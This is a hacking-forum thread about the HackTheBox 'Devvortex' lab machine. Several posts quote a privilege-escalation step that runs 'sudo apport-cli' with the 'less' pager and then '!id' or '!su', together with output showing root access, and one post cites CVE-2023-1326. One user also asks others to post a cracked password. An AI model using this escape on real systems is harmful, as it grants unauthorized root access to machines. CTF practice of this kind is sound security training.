HTB Devvortex
by take1312 - Saturday November 25, 2023 at 03:54 PM
#51
(Nov 25, 2023, 08:26 PM)rebelHex Wrote: I was just going to paste the actual result of john but let people work it out a bit Smile

could you send me the password. Its taking me ages to crack the hash !!!!!!
Reply
#52
(Nov 26, 2023, 04:47 AM)noobhumein Wrote:
(Nov 25, 2023, 09:29 PM)metrem Wrote: logan@devvortex:~$ sudo apport-cli -c /bin/mysql less

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)



How did you find out you have to put `less` after the command ?? i couldn't get any hint in the POC as well

dammmmmmmmmmmmmmmmmmmm bro how did you think of using less ???? I have seen many explaining the vulnerability but none of them helped me... except when I tried to use your command there everything worked wonderfully.... explain a little your way of thinking or the method xD you are super confused...
Reply
#53
(Nov 28, 2023, 01:33 AM)tetra02 Wrote:
(Nov 26, 2023, 04:47 AM)noobhumein Wrote:
(Nov 25, 2023, 09:29 PM)metrem Wrote: logan@devvortex:~$ sudo apport-cli -c /bin/mysql less

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)



How did you find out you have to put `less` after the command ?? i couldn't get any hint in the POC as well

dammmmmmmmmmmmmmmmmmmm bro how did you think of using less ???? I have seen many explaining the vulnerability but none of them helped me... except when I tried to use your command there everything worked wonderfully.... explain a little your way of thinking or the method xD you are super confused...

CVE-2023-1326 explains the exploit a bit. Once you use less just do !su and you're root
Reply
#54
(Nov 26, 2023, 04:47 AM)noobhumein Wrote:
(Nov 25, 2023, 09:29 PM)metrem Wrote: logan@devvortex:~$ sudo apport-cli -c /bin/mysql less

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)



How did you find out you have to put `less` after the command ?? i couldn't get any hint in the POC as well

guysssss anyone ??
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,759 5 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,962 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,893 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,621 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,271 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)